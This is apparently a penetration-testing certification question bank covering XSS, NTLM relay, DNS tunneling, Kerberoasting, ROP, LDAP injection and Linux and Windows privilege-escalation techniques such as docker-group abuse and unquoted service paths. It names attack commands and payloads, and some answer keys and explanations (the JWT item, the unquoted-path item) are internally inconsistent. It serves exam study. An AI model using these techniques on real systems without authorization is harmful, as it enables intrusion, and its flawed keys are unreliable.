The response includes the parameter value 'John' reflected directly in the HTML body without sanitization or encoding, and the request uses an HTTP GET method. This confirms a reflected cross-site scripting (XSS) vulnerability, as the tester can inject arbitrary JavaScript by modifying the 'name' parameter, which will execute in the victim's browser.

Exam trap

The trap here is that candidates may confuse reflected XSS with stored XSS or CSRF, but the key indicator is that the input appears only in the response to that specific request (reflected), not stored on the server, and the GET method with no state change rules out CSRF.

How to eliminate wrong answers

Option A is wrong because server-side request forgery (SSRF) involves the server making requests to internal resources based on user input, but the response shows the input reflected in the page, not a server-side request. Option B is wrong because cross-site request forgery (CSRF) requires a forged request that changes state (e.g., via POST), but the request shown is a simple GET with no state-changing action, and the response reflects input without requiring a session token. Option C is wrong because SQL injection would cause database errors or altered data in the response, but the response simply echoes the input 'John' without any SQL syntax or error messages.

28
MCQmedium

A penetration tester needs to escalate privileges on a Linux target after gaining initial shell access. The /etc/passwd file shows a user 'jake' with UID 0. What does this indicate?

A.The user 'jake' is a normal user with UID misconfiguration
B.The user 'jake' is a member of the root group
C.The user 'jake' has the same privileges as root
D.There is a duplicate user 'jake' and 'root'
AnswerC

A UID of 0 means the account is the superuser, regardless of username.

Why this answer

In Linux, a UID (User ID) of 0 is reserved exclusively for the root superuser. When the /etc/passwd file shows a user 'jake' with UID 0, the system treats 'jake' with the same privileges as root, regardless of the username. This is because the kernel checks the UID, not the username, for permission decisions.

Therefore, 'jake' has full root-level access, making option C correct.

Exam trap

The trap here is that candidates confuse UID 0 with group membership (GID 0) or assume it's a misconfiguration, when in fact the UID field in /etc/passwd directly determines superuser status, not the username or group.

How to eliminate wrong answers

Option A is wrong because a UID of 0 is not a misconfiguration; it is the defined superuser identifier per POSIX standards, so 'jake' is not a normal user but has root privileges. Option B is wrong because group membership (e.g., being in the root group with GID 0) does not grant root privileges; only UID 0 confers superuser authority, and the /etc/passwd entry shows UID, not group membership. Option D is wrong because there is no duplicate user; 'jake' and 'root' are separate usernames, but both have UID 0, meaning they share the same superuser identity—this is not a duplicate account but a security concern.

29
MCQmedium

During an internal penetration test, a tester captures a NetNTLMv2 hash via an SMB relay attack. The target network does not enforce SMB signing. What is the most effective next step to gain access to a remote server?

A.Crack the hash offline using a dictionary attack.
B.Relay the captured hash to authenticate to another server.
C.Perform a pass-the-hash attack using the captured hash.
D.Use the hash to perform an LLMNR poisoning attack.
AnswerB

Without SMB signing, the NetNTLMv2 hash can be relayed to obtain authenticated access to other systems on the network.

Why this answer

Since SMB signing is not enforced, the tester can relay the captured NetNTLMv2 hash directly to another server without needing to crack it. This works because the relay attack forwards the authentication challenge-response to a target server, allowing the tester to authenticate as the victim user without knowing the plaintext password. This is the most effective step because it provides immediate access without the time and resource cost of offline cracking.

Exam trap

The trap here is that candidates often confuse NetNTLMv2 with NTLM hashes, assuming pass-the-hash works with any hash type, when in fact pass-the-hash requires the raw NTLM hash (from LSASS or a dump) and not the challenge-response variant captured via relay.

How to eliminate wrong answers

Option A is wrong because offline cracking of NetNTLMv2 hashes is computationally expensive and time-consuming, especially for complex passwords, making it less effective than relaying when SMB signing is disabled. Option C is wrong because pass-the-hash requires an NTLM hash (not NetNTLMv2), which is a different format; NetNTLMv2 is a challenge-response hash that cannot be directly used in a pass-the-hash attack. Option D is wrong because LLMNR poisoning is a technique to capture hashes, not a method to use an already-captured hash for authentication; the hash has already been obtained, so poisoning is unnecessary.

30
Multi-Selecthard

Which TWO of the following are indicators that a web application is vulnerable to XML External Entity (XXE) attacks? (Select TWO.)

Select 2 answers
A.Directory traversal in file upload functionality
B.Persistent cross-site scripting in user profiles
C.Exfiltration of files via HTTP requests to an attacker-controlled server
D.Application crashes when processing a malformed XML file
E.Successful UNION-based SQL injection
AnswersC, D

XXE can use external entities to send files to attacker.

Why this answer

Option C is correct because XXE attacks allow an attacker to define an external entity that references a local file (e.g., file:///etc/passwd) and then have that entity's content included in an HTTP request to an attacker-controlled server. This exfiltration via out-of-band HTTP requests is a classic indicator of a successful XXE exploitation, as the attacker can read sensitive files from the server's filesystem.

Exam trap

CompTIA often tests the distinction between direct indicators of XXE (like file exfiltration via HTTP and parser crashes) and other common web vulnerabilities, so candidates mistakenly select directory traversal or SQL injection because they associate 'file reading' or 'data extraction' with XXE without recognizing the specific XML parser behavior.

31
MCQhard

A penetration tester has exploited a web application and found that the server has an outbound firewall that restricts all outbound traffic except for DNS queries (UDP 53). The tester has a reverse shell payload that connects back on TCP 443. Which technique can the tester use to exfiltrate data or establish a channel?

A.Use netcat to send data over TCP 53
B.Use an SSH tunnel over UDP 53
C.Use dnscat2 or other DNS tunneling tool
D.Use a bind shell listening on TCP 443 internally
AnswerC

DNS tunneling encodes data in DNS queries, which are permitted by the firewall. This allows the tester to establish a channel and exfiltrate data.

Why this answer

Option C is correct because DNS tunneling tools like dnscat2 encode data within DNS queries and responses, allowing the tester to bypass outbound firewall restrictions that only permit UDP 53 traffic. Since the reverse shell payload uses TCP 443, which is blocked, DNS tunneling provides an alternative covert channel that encapsulates the communication within legitimate DNS lookups, effectively exfiltrating data or establishing a command-and-control channel over the allowed protocol.

Exam trap

The trap here is that candidates may assume any protocol can be tunneled over UDP 53 simply by changing the port, but DNS tunneling requires specialized tools that encapsulate data within DNS message formats, not just raw TCP or SSH over UDP.

How to eliminate wrong answers

Option A is wrong because netcat cannot send data over TCP 53 when the outbound firewall only allows UDP 53; TCP 53 is a different protocol and would be blocked. Option B is wrong because SSH tunnels operate over TCP, not UDP, and UDP 53 is used for DNS queries, not SSH; attempting an SSH tunnel over UDP 53 would fail as SSH does not natively support UDP transport. Option D is wrong because a bind shell listening on TCP 443 internally requires the tester to initiate an inbound connection to that port, but the outbound firewall does not restrict inbound traffic; however, the tester is behind the firewall and needs an outbound channel, and a bind shell does not solve the outbound restriction problem.

32
MCQeasy

A penetration tester gains access to a web application that uses a MongoDB backend. The tester discovers that the search functionality directly interpolates user input into a NoSQL query without sanitization. Which technique should the tester use to extract data from the database?

A.SQL injection
B.NoSQL injection
C.LDAP injection
D.Command injection
AnswerB

This is the correct technique because the application uses MongoDB and directly interpolates user input into queries. NoSQL injection manipulates the query logic by injecting operators like $gt or $ne.

Why this answer

Option B is correct because the application uses MongoDB, a NoSQL database, and the search functionality directly interpolates user input into a NoSQL query without sanitization. This allows the tester to inject MongoDB operators (e.g., $ne, $regex, $gt) to manipulate the query logic and extract data, which is the core of NoSQL injection. Unlike SQL injection, this technique targets MongoDB's query syntax, such as JSON-based operators, to bypass authentication or retrieve records.

Exam trap

The trap here is that candidates see 'injection' and default to SQL injection (Option A) without recognizing that the backend is MongoDB, a NoSQL database, which requires a different injection technique using JSON operators rather than SQL syntax.

How to eliminate wrong answers

Option A is wrong because SQL injection targets relational databases using SQL syntax (e.g., SELECT, UNION), but MongoDB uses a document-based query language with JSON-like operators, not SQL. Option C is wrong because LDAP injection exploits Lightweight Directory Access Protocol queries (e.g., LDAP filters) to manipulate directory services, not NoSQL databases like MongoDB. Option D is wrong because command injection targets operating system commands (e.g., shell commands) via system calls, not database queries, and the vulnerability here is in the database query layer, not the OS.

33
MCQhard

A penetration tester has gained a low-privileged command shell on a Windows 10 system. The tester suspects there is a vulnerable service with an unquoted service path that can be exploited for privilege escalation. Which command should the tester use to identify all services with this vulnerability?

A.Get-Service | Format-List Name,PathName
B.reg query HKLM\SYSTEM\CurrentControlSet\Services\ /s /v ImagePath
C.sc query type= all state= all | findstr "SERVICE_NAME"
D.net start
AnswerB

Correct. This registry query recursively lists all services and their ImagePath values. The tester can then inspect paths that contain spaces and are not enclosed in quotes.

Why this answer

Option B is correct because the `reg query` command with the `/s` switch recursively searches the registry key `HKLM\SYSTEM\CurrentControlSet\Services` for the `ImagePath` value of each service. An unquoted service path vulnerability occurs when the `ImagePath` contains spaces and is not enclosed in quotes, allowing an attacker to execute arbitrary code by placing a malicious executable in a path that Windows interprets as a command with arguments. This command directly retrieves the raw path strings from the registry, making it the most reliable method to identify unquoted paths.

Exam trap

The trap here is that candidates assume `sc query` or `Get-Service` will reveal the raw unquoted path, but these commands may normalize or omit quotation marks, whereas the registry `ImagePath` value stores the exact string used by the service, including missing quotes.

How to eliminate wrong answers

Option A is wrong because `Get-Service | Format-List Name,PathName` only displays the service name and its binary path name as reported by the Service Control Manager, but it does not show the raw registry `ImagePath` value; PowerShell may automatically quote or normalize the path, hiding the unquoted vulnerability. Option C is wrong because `sc query type= all state= all | findstr "SERVICE_NAME"` only lists service names, not their binary paths, so it cannot reveal unquoted service paths. Option D is wrong because `net start` only lists currently running services by display name, not their executable paths, and provides no information about the path format or quotation.

34
MCQhard

A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester captures a valid JWT from a user session. The JWT header contains a 'kid' (key ID) parameter. The tester suspects the application is vulnerable to a key injection attack via the 'kid' parameter. Which attack technique should the tester use to forge a valid JWT without knowing the secret key?

A.Set the algorithm header to 'none' (null signature attack).
B.Replace the 'kid' value with a path to a known file on the server (e.g., /dev/null) that contains predictable content.
C.Use a side-channel attack to extract the secret key.
D.Perform a timing attack to recover the secret key character by character.
AnswerA

If the server accepts tokens with algorithm 'none', it will skip signature verification, allowing the tester to forge any token.

Why this answer

Option A is correct because setting the algorithm header to 'none' removes the need for a signature entirely. The JWT library, if not properly configured to reject 'none' algorithm tokens, will accept the forged token as valid, allowing the tester to impersonate any user without knowing the secret key.

Exam trap

The trap here is that candidates confuse the 'none' algorithm attack with the 'kid' injection attack (option B), but the question specifically asks for a technique to forge a token without knowing the secret key, which the 'none' attack achieves directly.

How to eliminate wrong answers

Option B is wrong because replacing the 'kid' value with a path like /dev/null is a key injection attack that exploits the 'kid' parameter to point to a file whose contents are used as the secret key, but this does not forge a token without knowing the secret; it manipulates the key source. Option C is wrong because a side-channel attack (e.g., power analysis, electromagnetic leaks) is impractical against a remote web application and does not directly forge a JWT. Option D is wrong because a timing attack recovers the secret key by measuring response time variations, but it requires many requests and does not immediately forge a token; it is a key recovery method, not a direct forgery technique.

35
MCQmedium

An organization has a web application that stores session tokens in a cookie named 'auth_token'. The token is a base64-encoded JSON object containing the username, role, and expiration timestamp. Which attack is most likely to succeed if the encryption is not used?

A.Session replay
B.Cross-site request forgery
C.Cookie tampering
D.Session hijacking
AnswerC

The tester can decode the cookie, change values, and re-encode to escalate privileges.

Why this answer

Option C is correct because the session token is a base64-encoded JSON object without encryption, making it trivially easy to decode, modify (e.g., change the role to 'admin' or extend the expiration timestamp), re-encode, and send back to the server. This is a classic cookie tampering attack, as the server trusts the client-provided data without integrity verification.

Exam trap

CompTIA often tests the distinction between encoding and encryption, and the trap here is that candidates confuse base64 encoding with actual security, assuming it protects the token's integrity or confidentiality.

How to eliminate wrong answers

Option A is wrong because session replay involves capturing and reusing a valid token unchanged, but the question focuses on the lack of encryption enabling modification, not reuse. Option B is wrong because cross-site request forgery (CSRF) exploits the user's authenticated session to perform unintended actions, not the ability to tamper with the cookie content itself. Option D is wrong because session hijacking typically involves stealing a valid session token (e.g., via XSS or network sniffing) and using it as-is, whereas the core vulnerability here is the ability to forge or alter the token's contents due to lack of encryption.

36
Multi-Selecthard

A tester has low-privilege shell access on a Linux server. Which two checks are most appropriate for local privilege escalation enumeration? (Choose 2.)

Select 2 answers
A.Review sudo privileges with sudo -l.
B.Find SUID binaries and inspect unusual or writable executables.
C.Run a full SYN scan of the public IP range.
D.Send phishing emails to the finance department.
AnswersA, B

Misconfigured sudo rules are a common privilege escalation path.

Why this answer

Option A is correct because `sudo -l` lists the commands the current user can execute with elevated privileges, which is a standard first step in privilege escalation enumeration. If the user has sudo rights to any command without a password or with a known password, they can potentially run that command as root, leading to full system compromise.

Exam trap

The trap here is that candidates confuse network scanning or social engineering with local enumeration techniques, forgetting that the question explicitly states the tester already has low-privilege shell access on the target server.

37
MCQmedium

A penetration tester has gained a low-privileged shell on a Linux server. During enumeration, the tester discovers a binary with the SUID bit set that belongs to root and is known to have a buffer overflow vulnerability. What is the MOST effective next step to escalate privileges?

A.Use the binary to execute a command that changes the root password
B.Develop and execute a buffer overflow exploit against the binary to gain a root shell
C.Modify the binary's permissions to allow execution by any user
D.Use sudo to run the binary as root
AnswerB

This is the correct approach. Exploiting the SUID binary allows privilege escalation to root.

Why this answer

The SUID binary owned by root and vulnerable to a buffer overflow allows a low-privileged user to execute it with root privileges. Developing and executing a buffer overflow exploit against the binary will overwrite the return address or function pointer to spawn a root shell, directly escalating privileges to root. This is the most effective method because it leverages the existing vulnerability to gain full control without relying on other misconfigurations.

Exam trap

The trap here is that candidates may confuse SUID with sudo, assuming sudo can be used to run the binary as root, but SUID binaries execute with the owner's privileges automatically without requiring sudoers configuration.

How to eliminate wrong answers

Option A is wrong because changing the root password requires root privileges or the ability to write to /etc/shadow, which the low-privileged shell does not have; the SUID binary does not inherently provide a mechanism to execute arbitrary commands like passwd. Option C is wrong because modifying the binary's permissions (e.g., chmod) is not possible from a low-privileged shell, as the binary is owned by root and the SUID bit is already set; the goal is to exploit the binary, not change its permissions. Option D is wrong because sudo requires the user to be in the sudoers file with appropriate permissions, which a low-privileged user typically does not have; the SUID binary is executed directly, not via sudo.

38
MCQhard

A penetration tester gains a low-privileged shell on a Linux server and discovers that the user is a member of the 'docker' group. The tester wants to escalate privileges to root. Which technique is most effective?

A.Use cron job misconfigurations to execute a reverse shell
B.Exploit kernel vulnerabilities using a local exploit suggester
C.Run a Docker container with the host filesystem mounted and access it as root
D.Abuse SETUID binaries to execute commands as root
AnswerC

By running a Docker container with the host filesystem mounted (e.g., `docker run -v /:/mnt -it alpine chroot /mnt`), the user can access all host files as root because Docker effectively runs as root. This bypasses normal privilege restrictions.

Why this answer

Option C is correct because members of the 'docker' group can run Docker containers with the `-v /:/mnt` flag to mount the host filesystem into the container. Inside the container, the user effectively has root privileges (since the container runs as root by default) and can access the host's `/mnt` directory, allowing them to modify files like `/mnt/etc/shadow` or add an SSH key to `/mnt/root/.ssh/authorized_keys` to gain root access on the host.

Exam trap

CompTIA often tests the misconception that kernel exploits are always the fastest path to root, but the trap here is that membership in the 'docker' group is a trivial and reliable escalation vector that bypasses the need for kernel exploitation or other complex techniques.

How to eliminate wrong answers

Option A is wrong because cron job misconfigurations require write access to a cron directory or a user's crontab, which the low-privileged user does not have; the 'docker' group membership does not grant cron-related privileges. Option B is wrong because exploiting kernel vulnerabilities is a valid privilege escalation technique, but it is not the most effective here since the 'docker' group provides a direct, reliable, and less risky path to root without needing to match a specific kernel version or risk system instability. Option D is wrong because abusing SETUID binaries requires finding a binary with the SUID bit set that can be exploited (e.g., via a known vulnerability or misconfiguration), but the 'docker' group membership offers a more straightforward and guaranteed escalation path.

39
MCQhard

During an internal penetration test, a tester discovers a Windows server running a custom service that is vulnerable to a stack-based buffer overflow. The binary has Data Execution Prevention (DEP) enabled but Address Space Layout Randomization (ASLR) is disabled. Which exploitation technique would be MOST effective to achieve code execution?

A.Injecting shellcode directly onto the stack and overwriting the return address to jump to it
B.Using a return-to-libc attack to call system() with a command string
C.Constructing a ROP chain using gadgets from loaded DLLs to simulate shellcode execution
D.Enabling the execute bit on the stack via a memory corruption primitive
AnswerC

ROP allows arbitrary code execution by reusing existing code segments, effectively bypassing DEP when ASLR is disabled.

Why this answer

With DEP enabled, the stack is marked non-executable, so injecting shellcode directly (option A) would fail. ASLR being disabled means the addresses of loaded DLLs are predictable, making it feasible to construct a ROP chain using gadgets from those DLLs to simulate shellcode execution. Option C is correct because ROP chains bypass DEP by reusing existing executable code (gadgets) without needing to execute code on the stack.

Exam trap

The trap here is that candidates assume DEP can be bypassed simply by enabling execution on the stack (option D) without realizing that doing so requires a ROP chain or similar technique to call VirtualProtect, making option C the more direct and effective approach.

How to eliminate wrong answers

Option A is wrong because DEP prevents execution of code on the stack, so overwriting the return address to jump to injected shellcode will cause an access violation. Option B is wrong because a return-to-libc attack typically calls a single function like system() from libc, but on Windows the equivalent (e.g., calling system() from msvcrt) is limited; more importantly, return-to-libc cannot easily chain multiple function calls to achieve arbitrary shellcode behavior, whereas a ROP chain can. Option D is wrong because enabling the execute bit on the stack would require a separate memory corruption primitive to modify page permissions (e.g., via VirtualProtect), which itself would need to be called through ROP or similar; it is not a direct exploitation technique and is less effective than constructing a full ROP chain.

40
MCQmedium

A penetration tester has successfully exploited a web application and gained a reverse shell as the www-data user on a Linux server. The tester wants to escalate privileges to root. The server is running a vulnerable version of polkit's pkexec (CVE-2021-4034). Which action should the tester take to exploit this vulnerability?

A.Execute the 'sudo -u root' command
B.Run the 'pkexec' binary with crafted environment variables
C.Modify the PATH environment variable to include a malicious executable
D.Use a generic kernel exploit for privilege escalation
AnswerB

The PwnKit vulnerability is triggered by running pkexec with specific environment variables (e.g., a modified PATH) that cause a buffer overflow, allowing privilege escalation.

Why this answer

Option B is correct because CVE-2021-4034 (PwnKit) is a memory corruption vulnerability in polkit's pkexec that allows an unprivileged user to escalate privileges to root by running the pkexec binary with crafted environment variables. Specifically, by setting the PATH and other environment variables to trigger an out-of-bounds write, the attacker can execute arbitrary code as root without authentication.

Exam trap

The trap here is that candidates may confuse this with a PATH hijacking attack (option C) or assume sudo is the default escalation method, but CVE-2021-4034 specifically requires crafted environment variables like GCONV_PATH, not just PATH modification.

How to eliminate wrong answers

Option A is wrong because 'sudo -u root' requires the www-data user to have sudo privileges configured in /etc/sudoers, which is not the case here; it would fail with a permission error. Option C is wrong because modifying the PATH environment variable alone does not exploit CVE-2021-4034; the vulnerability requires specific crafted environment variables (like GCONV_PATH) to trigger the out-of-bounds write in pkexec, not just PATH manipulation. Option D is wrong because using a generic kernel exploit is unnecessary when a specific, reliable exploit for the known vulnerable pkexec binary exists; generic kernel exploits may also fail due to kernel version mismatches or security mitigations.

41
MCQmedium

A penetration tester has gained low-privilege access on a Windows 10 machine. The tester discovers that a service runs with SYSTEM privileges and has the following binary path: C:\Program Files\MyApp\service.exe. The path is unquoted. Which exploitation technique is most likely to allow the tester to escalate privileges?

A.Create a malicious executable named 'C:\Program.exe' and place it in the root of C:.
B.Create a malicious executable named 'MyApp.exe' and place it in C:\Program Files\.
C.Modify the service's binary path in the registry to point to a malicious executable.
D.Use SeImpersonatePrivilege to impersonate the SYSTEM account and directly modify the service.
AnswerB

Correct. Because the service path is unquoted, Windows will first try to execute 'C:\Program.exe', but that does not exist. It then tries 'C:\Program Files\MyApp.exe'. If the tester can write to 'C:\Program Files\', they can place a malicious 'MyApp.exe' there. When the service starts, it will run the malicious executable with SYSTEM privileges.

Why this answer

The unquoted service binary path 'C:\Program Files\MyApp\service.exe' allows Windows to interpret spaces as separators, so it will attempt to execute 'C:\Program.exe' first, then 'C:\Program Files\MyApp.exe', and finally the intended path. By placing a malicious 'MyApp.exe' in 'C:\Program Files\', the tester exploits the space in 'Program Files' to hijack execution before the legitimate service.exe runs, achieving privilege escalation to SYSTEM.

Exam trap

The trap here is that candidates may assume the exploit requires placing an executable at the root (C:\Program.exe) or modifying the registry, but the correct technique exploits the space in 'Program Files' by placing the malicious binary in that directory, not at the root.

How to eliminate wrong answers

Option A is wrong because placing 'C:\Program.exe' would execute before the service path is fully resolved, but the intended service binary is deeper; the unquoted path first tries 'C:\Program.exe', but the correct exploitation point is the space in 'Program Files', not the root. Option C is wrong because modifying the service's binary path in the registry requires administrative privileges to edit the service configuration, which the tester does not have with low-privilege access. Option D is wrong because SeImpersonatePrivilege allows token impersonation but does not grant direct modification of a service's binary path; it is used for techniques like token theft or potato attacks, not for unquoted service path exploitation.

42
Multi-Selecthard

Which THREE of the following are common techniques used to evade antivirus (AV) detection of post-exploitation tools? (Choose three.)

Select 3 answers
A.Obfuscate the payload code
B.Pack the executable with a crypter
C.Use encrypted communication channels
D.Enable SMB file sharing
E.Apply the latest Windows patches
AnswersA, B, C

Obfuscation changes the code pattern to avoid signature detection.

Why this answer

Obfuscating the payload code transforms the malicious code into a different representation (e.g., XOR encoding, Base64, or custom encryption) that does not match known AV signatures. AV engines rely on static signature matching, so by altering the byte sequence without changing the payload's functionality, the tool evades signature-based detection. This is a fundamental technique used in frameworks like Metasploit with its 'shikata_ga_nai' encoder.

Exam trap

The trap here is that candidates confuse system hardening or network configuration changes (like SMB sharing or patching) with active evasion techniques, when in fact only code transformation and communication encryption directly hide the malicious tool from AV.

43
Multi-Selecteasy

Which THREE of the following are example of privilege escalation techniques on Linux systems? (Select THREE.)

Select 3 answers
A.Exploiting kernel vulnerabilities
B.Exploiting SUID binary vulnerabilities
C.Token manipulation
D.Sudo misconfiguration exploitation
E.Pass-the-hash
AnswersA, B, D

Kernel exploits can grant root-level access.

Why this answer

Exploiting kernel vulnerabilities (Option A) is a privilege escalation technique because the Linux kernel operates with the highest system privileges (ring 0). A vulnerability in the kernel, such as a use-after-free or race condition in a syscall handler, can allow an attacker to execute arbitrary code with kernel-level privileges, effectively gaining root access. Common examples include the Dirty Cow (CVE-2016-5195) vulnerability, which exploited a race condition in the memory subsystem to achieve local privilege escalation.

Exam trap

CompTIA often tests the distinction between Windows-specific and Linux-specific privilege escalation techniques, so the trap here is that candidates may mistakenly apply Windows concepts like token manipulation or pass-the-hash to Linux environments, where they are not valid.

44
MCQmedium

A penetration tester has gained access to a Windows domain and wants to perform a Kerberoasting attack. Which account privileges are required to request service tickets for Kerberoasting?

A.Domain Admin
B.Any domain user
C.Local Administrator on the domain controller
D.Enterprise Admin
AnswerB

Any authenticated user in the domain can request service tickets, making Kerberoasting a low-privilege attack vector.

Why this answer

Kerberoasting exploits the Kerberos protocol's TGS-REP step, where any domain user can request a service ticket for any service principal name (SPN) in Active Directory. The domain controller returns the ticket encrypted with the service account's NTLM hash, which the attacker can then crack offline. No special privileges beyond being a valid domain user are required because the TGS request is part of normal Kerberos authentication.

Exam trap

Cisco often tests the misconception that Kerberoasting requires administrative privileges, when in fact any authenticated domain user can request service tickets because the Kerberos protocol does not enforce authorization checks at the TGS request stage.

How to eliminate wrong answers

Option A is wrong because Domain Admin privileges are not needed; Kerberoasting only requires the ability to authenticate to the domain, and Domain Admin is an overprivileged role that would expose the attacker to more detection. Option C is wrong because Local Administrator on the domain controller is irrelevant; the attack does not require local administrative access to any machine, as the TGS request is made over the network to the domain controller. Option D is wrong because Enterprise Admin is a forest-wide administrative role; Kerberoasting can be performed by any authenticated domain user without any elevated group membership.

45
MCQhard

During a penetration test, a tester identifies a buffer overflow vulnerability in a Linux binary that has both ASLR and NX (Non-Executable) enabled. The tester discovers a ROP gadget at a fixed address in a library that is not affected by ASLR. Which technique can be used to exploit this vulnerability and achieve code execution?

A.Heap spraying to predict memory layout and inject shellcode
B.Return-oriented programming (ROP) using the fixed gadgets
C.Stack canary bypass using information leak
D.Format string attack to overwrite GOT entries
AnswerB

ROP uses fixed gadgets to create a chain that bypasses NX and, with fixed addresses, can also bypass ASLR.

Why this answer

Return-oriented programming (ROP) is the correct technique because ASLR and NX are both enabled, preventing direct shellcode execution and making memory addresses unpredictable. However, the tester found a ROP gadget at a fixed address in a library not affected by ASLR, allowing the construction of a chain of gadgets to achieve arbitrary code execution without needing to inject or execute shellcode on the stack.

Exam trap

The trap here is that candidates may choose heap spraying (Option A) thinking it bypasses ASLR, but they forget that NX still blocks shellcode execution, making ROP the only viable technique when fixed gadgets are available.

How to eliminate wrong answers

Option A is wrong because heap spraying is used to increase the predictability of heap memory layout for exploiting use-after-free or heap-based vulnerabilities, but it does not bypass NX (which prevents shellcode execution) and does not leverage fixed-address ROP gadgets. Option C is wrong because a stack canary bypass using an information leak addresses stack smashing protection but does not overcome NX or ASLR; it would still require a method to execute code, which ROP provides. Option D is wrong because a format string attack can overwrite GOT entries to redirect execution, but it does not inherently bypass NX or ASLR unless combined with other techniques, and the question specifies that a fixed-address ROP gadget is available, making ROP the direct and intended approach.

46
MCQmedium

A penetration tester gained low-privileged access to a Linux server and found that the user can run a custom script located at /opt/tool/backup.sh with setuid root. The script begins with a hashbang #!/bin/bash and uses an internal variable defined as BASEDIR=$(dirname $0) to determine paths. Which technique is most likely to allow privilege escalation?

A.Modify the $0 variable during execution
B.Create a malicious executable named 'dirname' in a directory earlier in the PATH
C.Overwrite /opt/tool/backup.sh with a reverse shell
D.Exploit a buffer overflow in the Bash interpreter
AnswerB

Since the script uses $(dirname $0) without an absolute path, the system searches PATH for 'dirname'. If the attacker puts a malicious 'dirname' script in a writable directory earlier in PATH, it will be executed as root.

Why this answer

Option B is correct because the script uses `BASEDIR=$(dirname $0)` to resolve paths. If the user can place a malicious executable named `dirname` earlier in the PATH than the legitimate `/usr/bin/dirname`, then when the script runs with setuid root, the shell will execute the attacker's `dirname` binary instead, allowing arbitrary code execution as root.

Exam trap

The trap here is that candidates may focus on modifying `$0` (Option A) or overwriting the script (Option C), but the actual vulnerability lies in the insecure use of a relative command (`dirname`) within a setuid script, which allows PATH hijacking.

How to eliminate wrong answers

Option A is wrong because the `$0` variable is set by the shell to the script's path (e.g., `/opt/tool/backup.sh`) and cannot be modified by the user during execution; it is read-only in this context. Option C is wrong because the user has only low-privileged access and cannot overwrite `/opt/tool/backup.sh` (owned by root) without already having root privileges. Option D is wrong because there is no indication of a buffer overflow vulnerability in the Bash interpreter; the script is a simple shell script, and the attack vector is PATH hijacking, not memory corruption.

47
MCQhard

During an internal penetration test, a tester gains a shell as the 'www-data' user on a Linux server. The server runs a PHP web application that connects to a PostgreSQL database using credentials stored in a config file. The tester discovers that the PostgreSQL server trusts all local connections (no password required) and that the web application's database user has the 'CREATEFUNC' privilege. Which technique is most effective for escalating privileges to database administrator (superuser) and executing system commands as the database service account?

A.Use the stored credentials to log in as the web application user and run SELECT * FROM pg_shadow; to extract password hashes of other users.
B.Create a PostgreSQL function using a trusted language like Python or Perl that executes arbitrary system commands, then run it.
C.Exploit a kernel vulnerability to gain root access and then dump the database files.
D.Use the 'sudo' command to switch to the postgres user if the www-data user has sudo privileges.
AnswerB

This technique leverages CREATEFUNC to run shell commands as the database service account, enabling privilege escalation.

Why this answer

Option B is correct because the 'CREATEFUNC' privilege allows the web application database user to create user-defined functions in PostgreSQL. By creating a function in a trusted language (e.g., Python, Perl, or C) that executes arbitrary system commands, the tester can run those commands with the privileges of the database service account (e.g., 'postgres'), effectively escalating to superuser-level control and executing system commands without needing a password.

Exam trap

The trap here is that candidates may overlook the direct power of 'CREATEFUNC' in PostgreSQL and instead focus on password extraction (Option A) or generic kernel exploits (Option C), missing that database-level function creation is the most efficient and immediate escalation path.

How to eliminate wrong answers

Option A is wrong because querying pg_shadow extracts password hashes but does not directly escalate to superuser or execute system commands; it only provides hashes that would need to be cracked, and the web application user already has CREATEFUNC, making function creation a more direct path. Option C is wrong because exploiting a kernel vulnerability is unnecessary and less efficient; the tester already has a shell and can leverage database privileges to escalate without kernel exploits. Option D is wrong because the 'sudo' command requires the www-data user to have specific sudo privileges (e.g., to run commands as postgres), which is not indicated in the scenario; the tester has no evidence of sudo access.

48
MCQmedium

A penetration tester with a low-privileged domain user account performs a Kerberoasting attack. What is the primary goal of this attack?

A.Obtain the NTLM hash of the krbtgt account.
B.Obtain a list of all domain users.
C.Obtain a Kerberos ticket that can be used to impersonate a domain admin.
D.Obtain the plaintext password of a user account with a Service Principal Name (SPN).
AnswerD

Kerberoasting requests TGS tickets for SPN-linked accounts. These tickets can be cracked offline to reveal the password, potentially granting higher privileges if the account has administrative rights.

Why this answer

Kerberoasting targets service accounts that have a Service Principal Name (SPN) registered in Active Directory. The attacker requests a Kerberos service ticket (TGS) for the SPN, which is encrypted with the service account's NTLM hash. The attacker then cracks this hash offline to recover the plaintext password, enabling lateral movement or privilege escalation.

Exam trap

CompTIA often tests the misconception that Kerberoasting directly yields a domain admin ticket or a TGT, when in fact it only provides a service ticket that must be cracked offline to recover the plaintext password of the service account.

How to eliminate wrong answers

Option A is wrong because the krbtgt account's NTLM hash is used to sign Kerberos Ticket-Granting Tickets (TGTs), not service tickets; obtaining it requires a different attack like a Golden Ticket or DCSync. Option B is wrong because listing domain users is typically done via LDAP queries (e.g., enum4linux, ldapsearch) and is not the goal of Kerberoasting, which focuses on cracking service account passwords. Option C is wrong because Kerberoasting yields a TGS for a specific service, not a TGT; impersonating a domain admin would require a TGT or a forged ticket (e.g., Silver Ticket), not a service ticket for a single SPN.

49
MCQmedium

A penetration tester has gained a foothold on a Windows server and wants to move laterally to a domain controller. The tester has access to a service account that is a member of the 'Remote Management Users' group on the domain controller. Which of the following tools would be MOST appropriate for lateral movement in this scenario?

A.PsExec
B.MS16-075 exploit
C.WinRM
D.BloodHound
AnswerC

Correct. WinRM is designed for remote management and the account's group membership makes it usable for lateral movement.

Why this answer

WinRM (Windows Remote Management) is the most appropriate tool because the tester's service account is a member of the 'Remote Management Users' group on the domain controller, which grants explicit permission to connect via WinRM over HTTP/HTTPS (ports 5985/5986). This allows direct PowerShell remoting or winrs execution for lateral movement without requiring administrative privileges or additional exploits.

Exam trap

The trap here is that candidates often assume PsExec is the universal lateral movement tool, but it requires administrative privileges, whereas WinRM is specifically permitted by the 'Remote Management Users' group membership described in the scenario.

How to eliminate wrong answers

Option A is wrong because PsExec requires administrative privileges (typically local admin or domain admin) on the target system to execute services remotely, and membership in 'Remote Management Users' does not grant the necessary admin rights. Option B is wrong because MS16-075 is a local privilege escalation exploit (leveraging SeImpersonatePrivilege) that allows a low-privileged user to impersonate SYSTEM; it is not a lateral movement tool and does not leverage Remote Management Users group membership.

50
MCQmedium

During a web application test, a penetration tester suspects an LDAP injection vulnerability. The application uses user input to dynamically construct an LDAP query. The tester submits the following payload in the username field: 'admin)(&)'. The application returns a list of all users instead of the expected single user. Which of the following best describes the reason this payload was effective?

A.The payload causes an LDAP error that triggers a fallback to list all users.
B.The payload modifies the base DN to search the entire directory.
C.The payload introduces a logical OR that negates the original condition.
D.The payload closes the original filter and appends a tautology that returns all objects.
AnswerD

